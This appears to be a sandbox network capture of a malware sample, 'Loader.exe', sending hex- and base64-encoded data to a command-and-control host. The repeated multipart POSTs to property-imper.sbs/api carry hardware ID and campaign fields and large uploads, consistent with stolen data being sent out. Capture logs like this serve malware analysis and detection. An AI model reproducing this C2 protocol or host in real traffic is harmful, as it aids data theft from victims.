                                                                                            2024-11-23 08:49:03 UTC1369INData Raw: 45 76 39 6f 39 53 39 57 55 70 6c 4b 4c 35 74 47 5a 2f 67 2b 44 55 2b 6a 6d 65 76 6e 55 79 70 63 39 2f 43 68 38 5a 56 44 37 41 73 47 75 58 61 39 4c 46 51 41 77 41 56 69 32 51 74 6b 38 6e 4a 56 44 35 75 49 35 76 4a 54 5a 33 6a 7a 36 36 58 70 6c 31 72 76 51 42 7a 30 61 2f 49 6b 56 45 69 53 42 53 47 56 41 58 69 67 4a 68 55 6a 6b 5a 37 6d 6f 6e 74 79 59 2f 66 6e 73 66 43 62 52 4b 42 55 56 2b 34 76 2b 69 63 59 47 4e 68 46 62 74 67 55 5a 65 46 30 58 77 4b 61 67 4f 6e 6c 55 32 78 78 2b 2b 57 79 39 5a 6c 49 35 6b 41 59 38 6d 7a 32 49 56 5a 4a 69 67 55 68 6c 51 46 34 6f 43 59 56 4a 59 6d 4f 34 65 77 65 52 6e 37 6d 37 4f 4c 61 6d 45 50 6e 52 77 2b 33 63 4c 4d 79 47 45 65 55 42 54 65 56 44 32 37 73 66 56 49 48 6d 6f 72 73 36 31 78 6e 66 2f 37 73 73 76 47 61 51 76 4a
                                                                                            Data Ascii: Ev9o9S9WUplKL5tGZ/g+DU+jmevnUypc9/Ch8ZVD7AsGuXa9LFQAwAVi2Qtk8nJVD5uI5vJTZ3jz66Xpl1rvQBz0a/IkVEiSBSGVAXigJhUjkZ7montyY/fnsfCbRKBUV+4v+icYGNhFbtgUZeF0XwKagOnlU2xx++Wy9ZlI5kAY8mz2IVZJigUhlQF4oCYVJYmO4eweRn7m7OLamEPnRw+3cLMyGEeUBTeVD27sfVIHmors61xnf/7ssvGaQvJ
                                                                                            2024-11-23 08:49:03 UTC1369INData Raw: 37 30 30 46 6c 6e 59 51 6d 4f 56 58 69 44 67 65 6c 6b 4d 6c 59 48 6a 37 56 4e 76 66 76 2f 68 72 75 6d 5a 54 65 68 48 45 66 70 39 39 79 46 4b 53 5a 46 49 59 64 30 55 59 36 41 77 46 51 69 4b 7a 37 53 67 62 6d 4a 32 2f 50 32 74 39 4e 5a 58 72 6c 4a 5a 38 47 4f 39 63 78 68 53 69 6b 56 6b 31 51 46 75 38 6e 39 64 41 4a 69 50 36 75 74 57 61 33 7a 30 35 61 6e 39 6c 30 58 68 53 68 6e 79 62 2f 51 35 56 51 44 57 42 57 6a 4e 52 6a 69 67 53 56 6b 45 6f 34 7a 36 6f 45 4d 6d 62 4c 44 73 72 4c 76 4f 43 4f 46 5a 46 50 39 72 2f 53 5a 65 53 35 6c 45 62 4e 55 47 59 2b 42 37 58 67 43 55 69 4f 48 71 56 57 46 6e 2b 4f 2b 79 2b 35 70 4d 6f 41 56 5a 38 48 65 39 63 78 68 77 6d 30 35 6a 31 51 74 31 6f 47 45 62 46 74 4b 49 34 4b 41 45 4b 48 33 37 34 4b 62 77 6c 55 76 75 51 42 50 34
                                                                                            Data Ascii: 700FlnYQmOVXiDgelkMlYHj7VNvfv/hrumZTehHEfp99yFKSZFIYd0UY6AwFQiKz7SgbmJ2/P2t9NZXrlJZ8GO9cxhSikVk1QFu8n9dAJiP6utWa3z05an9l0XhShnyb/Q5VQDWBWjNRjigSVkEo4z6oEMmbLDsrLvOCOFZFP9r/SZeS5lEbNUGY+B7XgCUiOHqVWFn+O+y+5pMoAVZ8He9cxhwm05j1Qt1oGEbFtKI4KAEKH374KbwlUvuQBP4
                                                                                            2024-11-23 08:49:03 UTC1369INData Raw: 68 4c 6a 6b 52 69 33 67 6f 69 34 58 4e 46 43 4e 4c 42 72 4f 59 63 4d 43 57 2b 71 36 54 71 31 68 43 77 47 55 4b 69 50 4b 70 37 43 6c 2f 57 58 43 2f 44 52 6a 69 79 4d 42 55 64 30 74 65 73 70 31 39 36 5a 2f 62 6f 74 76 6a 52 64 74 35 72 45 76 74 73 38 53 70 66 41 4e 59 46 59 4a 56 65 57 61 42 39 52 78 33 64 6e 76 72 74 54 47 38 35 2b 50 71 74 39 39 59 47 6f 41 63 64 2f 47 50 34 4c 45 67 50 69 6c 56 6b 32 52 41 73 35 47 77 56 51 64 4b 65 35 2b 39 4f 5a 6e 4b 2f 2b 72 62 32 68 6b 76 6c 54 46 58 2f 66 76 41 6e 47 41 37 59 55 47 54 5a 41 47 33 31 4d 55 51 5a 6b 5a 6e 72 72 46 52 35 65 50 79 72 6e 37 58 57 55 4b 41 54 57 63 4a 73 38 79 56 66 56 6f 6b 49 54 39 34 4b 59 2b 78 2f 55 6b 2f 63 7a 2b 71 67 42 44 73 37 73 4f 2b 78 75 38 34 59 73 68 42 4d 70 44 69 74 65
                                                                                            Data Ascii: hLjkRi3goi4XNFCNLBrOYcMCW+q6Tq1hCwGUKiPKp7Cl/WXC/DRjiyMBUd0tesp196Z/botvjRdt5rEvts8SpfANYFYJVeWaB9Rx3dnvrtTG85+Pqt99YGoAcd/GP4LEgPilVk2RAs5GwVQdKe5+9OZnK/+rb2hkvlTFX/fvAnGA7YUGTZAG31MUQZkZnrrFR5ePyrn7XWUKATWcJs8yVfVokIT94KY+x/Uk/cz+qgBDs7sO+xu84YshBMpDite
                                                                                            2024-11-23 08:49:03 UTC1369INData Raw: 63 4c 38 4e 47 4f 4c 4d 77 46 52 33 53 31 36 79 6e 55 6d 56 30 38 2b 57 6a 36 59 52 4f 34 31 30 61 73 46 48 44 44 6c 56 4e 6e 55 74 6f 36 7a 68 42 36 6d 35 59 41 4a 57 78 30 74 64 4e 62 32 57 79 7a 61 50 74 6c 51 69 75 43 77 47 33 4e 37 30 4b 55 6c 43 56 53 6d 69 56 53 43 44 6b 50 67 31 50 74 34 4c 68 35 56 4a 76 4e 39 48 68 73 50 61 5a 54 36 41 46 57 66 73 76 70 57 74 5a 53 6f 68 49 59 4e 4a 4b 5a 2f 70 35 46 55 48 53 67 61 79 34 48 47 6c 2f 34 4f 61 76 2f 4e 70 4f 37 6b 56 5a 36 43 48 6b 61 30 34 41 77 42 59 68 6c 52 51 67 75 44 34 53 41 5a 2b 4f 37 2b 35 66 65 6d 66 32 36 4c 62 34 30 58 62 65 62 68 54 36 61 76 4d 73 5a 6e 36 35 54 33 2f 59 43 57 65 69 58 6c 49 5a 6b 62 48 53 31 30 31 76 5a 62 4c 4e 6f 2b 32 56 43 4b 34 4c 41 62 63 33 76 51 70 53 55 4a
                                                                                            Data Ascii: cL8NGOLMwFR3S16ynUmV08+Wj6YRO410asFHDDlVNnUto6zhB6m5YAJWx0tdNb2WyzaPtlQiuCwG3N70KUlCVSmiVSCDkPg1Pt4Lh5VJvN9HhsPaZT6AFWfsvpWtZSohIYNJKZ/p5FUHSgay4HGl/4Oav/NpO7kVZ6CHka04AwBYhlRQguD4SAZ+O7+5femf26Lb40XbebhT6avMsZn65T3/YCWeiXlIZkbHS101vZbLNo+2VCK4LAbc3vQpSUJ


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.449732172.67.162.844433864C:\Users\user\Desktop\Loader.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-11-23 08:49:04 UTC285OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=2OBWBKXCW3B465XR0YT
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 18174
                                                                                            Host: property-imper.sbs
                                                                                            2024-11-23 08:49:04 UTC15331OUTData Raw: 2d 2d 32 4f 42 57 42 4b 58 43 57 33 42 34 36 35 58 52 30 59 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 46 42 45 31 45 32 36 31 35 41 44 41 32 31 30 45 39 44 38 32 44 45 38 43 35 38 30 36 32 43 32 0d 0a 2d 2d 32 4f 42 57 42 4b 58 43 57 33 42 34 36 35 58 52 30 59 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 4f 42 57 42 4b 58 43 57 33 42 34 36 35 58 52 30 59 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 35
                                                                                            Data Ascii: --2OBWBKXCW3B465XR0YTContent-Disposition: form-data; name="hwid"3FBE1E2615ADA210E9D82DE8C58062C2--2OBWBKXCW3B465XR0YTContent-Disposition: form-data; name="pid"2--2OBWBKXCW3B465XR0YTContent-Disposition: form-data; name="lid"yau6Na--65
                                                                                            2024-11-23 08:49:04 UTC2843OUTData Raw: 6d b6 ae 65 d3 2c 95 40 cc 78 a8 6a 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e
                                                                                            Data Ascii: me,@xjf5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)
                                                                                            2024-11-23 08:49:06 UTC1020INHTTP/1.1 200 OK
                                                                                            Date: Sat, 23 Nov 2024 08:49:06 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=sujahet1pid0or8ssltln0u38n; expires=Wed, 19-Mar-2025 02:35:44 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zCf0F7xuTMXfCHsK4DzAOZ2yuoynL27tULGfqjWaM%2BmC%2FFt0nPr9oJiHZjQc1mN804UaqKl6KCMbYOl82NmYmQg%2FBHqfdz1bfYINu6Gx%2FewK3ZEno4rUksFLdnqkEnryK0BQ9Y4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8e6fe765abda7292-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1805&sent=13&recv=22&lost=0&retrans=0&sent_bytes=2846&recv_bytes=19139&delivery_rate=1579232&cwnd=252&unsent_bytes=0&cid=e9aa61085528b270&ts=2032&x=0"
                                                                                            2024-11-23 08:49:06 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                            Data Ascii: eok 8.46.123.75
                                                                                            2024-11-23 08:49:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            3192.168.2.449733172.67.162.844433864C:\Users\user\Desktop\Loader.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-11-23 08:49:08 UTC276OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=WM9XPGEXDDB
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 8747
                                                                                            Host: property-imper.sbs
                                                                                            2024-11-23 08:49:08 UTC8747OUTData Raw: 2d 2d 57 4d 39 58 50 47 45 58 44 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 46 42 45 31 45 32 36 31 35 41 44 41 32 31 30 45 39 44 38 32 44 45 38 43 35 38 30 36 32 43 32 0d 0a 2d 2d 57 4d 39 58 50 47 45 58 44 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 4d 39 58 50 47 45 58 44 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 35 32 34 37 39 35 30 39 34 0d 0a 2d 2d 57 4d 39 58 50 47 45 58 44 44 42 0d
                                                                                            Data Ascii: --WM9XPGEXDDBContent-Disposition: form-data; name="hwid"3FBE1E2615ADA210E9D82DE8C58062C2--WM9XPGEXDDBContent-Disposition: form-data; name="pid"2--WM9XPGEXDDBContent-Disposition: form-data; name="lid"yau6Na--6524795094--WM9XPGEXDDB
                                                                                            2024-11-23 08:49:08 UTC1019INHTTP/1.1 200 OK
                                                                                            Date: Sat, 23 Nov 2024 08:49:08 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=l5n9q9c6pthovm8ahmkjds5s5o; expires=Wed, 19-Mar-2025 02:35:47 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hJp%2BAvZXP64nqekw6AN%2FySKLc7qetJlB%2FT5oPkJU%2FPUD8CKtGJGDhufpkP9GN8dpVKSjXwg3fH8RX6nAKnrUBLtHzkXvgyw%2F04lYnYRFCFsV0vFaZJ2CkFT3tzxcYRAwFXFFzI0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8e6fe77a9dd18c35-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1802&sent=9&recv=14&lost=0&retrans=0&sent_bytes=2845&recv_bytes=9681&delivery_rate=1577525&cwnd=242&unsent_bytes=0&cid=4bfcac82e54a764f&ts=733&x=0"
                                                                                            2024-11-23 08:49:08 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                            Data Ascii: eok 8.46.123.75
                                                                                            2024-11-23 08:49:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            4192.168.2.449734172.67.162.844433864C:\Users\user\Desktop\Loader.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-11-23 08:49:10 UTC282OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=GDDRZO2CHAFMICFB
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 20430
                                                                                            Host: property-imper.sbs
                                                                                            2024-11-23 08:49:10 UTC15331OUTData Raw: 2d 2d 47 44 44 52 5a 4f 32 43 48 41 46 4d 49 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 46 42 45 31 45 32 36 31 35 41 44 41 32 31 30 45 39 44 38 32 44 45 38 43 35 38 30 36 32 43 32 0d 0a 2d 2d 47 44 44 52 5a 4f 32 43 48 41 46 4d 49 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 47 44 44 52 5a 4f 32 43 48 41 46 4d 49 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 35 32 34 37 39 35 30 39 34 0d
                                                                                            Data Ascii: --GDDRZO2CHAFMICFBContent-Disposition: form-data; name="hwid"3FBE1E2615ADA210E9D82DE8C58062C2--GDDRZO2CHAFMICFBContent-Disposition: form-data; name="pid"3--GDDRZO2CHAFMICFBContent-Disposition: form-data; name="lid"yau6Na--6524795094
                                                                                            2024-11-23 08:49:10 UTC5099OUTData Raw: 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00
                                                                                            Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                                                            2024-11-23 08:49:11 UTC1025INHTTP/1.1 200 OK
                                                                                            Date: Sat, 23 Nov 2024 08:49:11 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=ujgupt208mai8fmkq4abp4d4id; expires=Wed, 19-Mar-2025 02:35:49 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RdbSOx2s0y5azaYmNhpF5Y%2FZMTV3Ijvh5SoYzJralXZOmXy1AQY4KKdBSb4i%2BJW4msKDzIfEOl9qDUVrp%2BiDxRMEQ5GxOh56qmN1%2Fm9POzhKYf8U%2ByLJESn3%2B8C15H2w%2FT7DTf8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8e6fe788690d433a-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1691&sent=17&recv=26&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21392&delivery_rate=1696687&cwnd=241&unsent_bytes=0&cid=173ec710453e3b87&ts=899&x=0"
                                                                                            2024-11-23 08:49:11 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                            Data Ascii: eok 8.46.123.75
                                                                                            2024-11-23 08:49:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            5192.168.2.449735172.67.162.844433864C:\Users\user\Desktop\Loader.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-11-23 08:49:13 UTC281OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=M1ZIO7H9M3T3NTS1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 1236
                                                                                            Host: property-imper.sbs
                                                                                            2024-11-23 08:49:13 UTC1236OUTData Raw: 2d 2d 4d 31 5a 49 4f 37 48 39 4d 33 54 33 4e 54 53 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 46 42 45 31 45 32 36 31 35 41 44 41 32 31 30 45 39 44 38 32 44 45 38 43 35 38 30 36 32 43 32 0d 0a 2d 2d 4d 31 5a 49 4f 37 48 39 4d 33 54 33 4e 54 53 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4d 31 5a 49 4f 37 48 39 4d 33 54 33 4e 54 53 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 35 32 34 37 39 35 30 39 34 0d
                                                                                            Data Ascii: --M1ZIO7H9M3T3NTS1Content-Disposition: form-data; name="hwid"3FBE1E2615ADA210E9D82DE8C58062C2--M1ZIO7H9M3T3NTS1Content-Disposition: form-data; name="pid"1--M1ZIO7H9M3T3NTS1Content-Disposition: form-data; name="lid"yau6Na--6524795094
                                                                                            2024-11-23 08:49:13 UTC1020INHTTP/1.1 200 OK
                                                                                            Date: Sat, 23 Nov 2024 08:49:13 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=mqbdv069jmmq50gnv290mfkbaf; expires=Wed, 19-Mar-2025 02:35:52 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=81ENG57a9pgxpL5p1oF2qHx%2FO7wxJ6%2BIG3kthJ8f9MTEfrs6RE0dmmbJyX0xeGkXgWlvkQoKBOaEOHef3SLZ6T%2FEV%2B9cY7TuaD55F0sFgXbik%2F3p8%2FZaiYATC1jtiGpurncKXsA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8e6fe79989614308-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1667&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2153&delivery_rate=1669525&cwnd=225&unsent_bytes=0&cid=7fb4237aa9e2bce6&ts=715&x=0"
                                                                                            2024-11-23 08:49:13 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                            Data Ascii: eok 8.46.123.75
                                                                                            2024-11-23 08:49:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            6192.168.2.449736172.67.162.844433864C:\Users\user\Desktop\Loader.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-11-23 08:49:15 UTC275OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=UWB4V41J
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 549687
                                                                                            Host: property-imper.sbs
                                                                                            2024-11-23 08:49:15 UTC15331OUTData Raw: 2d 2d 55 57 42 34 56 34 31 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 46 42 45 31 45 32 36 31 35 41 44 41 32 31 30 45 39 44 38 32 44 45 38 43 35 38 30 36 32 43 32 0d 0a 2d 2d 55 57 42 34 56 34 31 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 55 57 42 34 56 34 31 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 35 32 34 37 39 35 30 39 34 0d 0a 2d 2d 55 57 42 34 56 34 31 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73
                                                                                            Data Ascii: --UWB4V41JContent-Disposition: form-data; name="hwid"3FBE1E2615ADA210E9D82DE8C58062C2--UWB4V41JContent-Disposition: form-data; name="pid"1--UWB4V41JContent-Disposition: form-data; name="lid"yau6Na--6524795094--UWB4V41JContent-Dis
                                                                                            2024-11-23 08:49:15 UTC15331OUTData Raw: 28 0d 85 ef c6 0d 03 9e e4 98 58 ff 9f cb 08 fb 2a 80 26 2e e7 66 5b fc 65 c0 f6 49 3e 3a 8d ad 20 66 ba 40 f7 34 16 88 5d 51 87 95 f2 09 c9 21 be 05 67 9d 05 05 02 a4 89 eb 37 c6 4f c4 09 d0 e6 8b d5 a7 e2 ef 84 db 6d 44 04 1c 0b db cb 30 fa 43 c8 d6 d9 f9 20 ca 38 08 af 0f 4a 3a 82 fc 27 f3 20 38 1b aa 94 c2 1f 69 86 0b f7 03 07 ad 4e 40 ae e6 79 0b 22 d5 37 2e 2d 0a dc f8 b7 e5 e3 80 4b df 58 df bb b4 11 fb 21 a7 77 e8 50 cd fa 8d ab 54 a8 c0 be a2 c3 a4 e4 6a 62 88 eb 64 5a 14 0a ee dd ef 23 62 84 09 45 a6 9d 18 9a 96 83 01 49 fe f1 d4 5c 50 1c ec e8 b2 e6 d0 a0 81 9f 0e 58 3a f8 be 4f 0f 6c 37 96 df 7d 73 6a 74 f0 e2 ee 7e ef 1b 27 7b a5 7b 27 c7 14 ed df 3a 94 54 65 bf b1 a9 28 f8 ef 62 da ec e1 7f 80 56 55 e8 07 6f 41 60 a4 21 3a be 4d 1f bf 05 a4
                                                                                            Data Ascii: (X*&.f[eI>: f@4]Q!g7OmD0C 8J:' 8iN@y"7.-KX!wPTjbdZ#bEI\PX:Ol7}sjt~'{{':Te(bVUoA`!:M
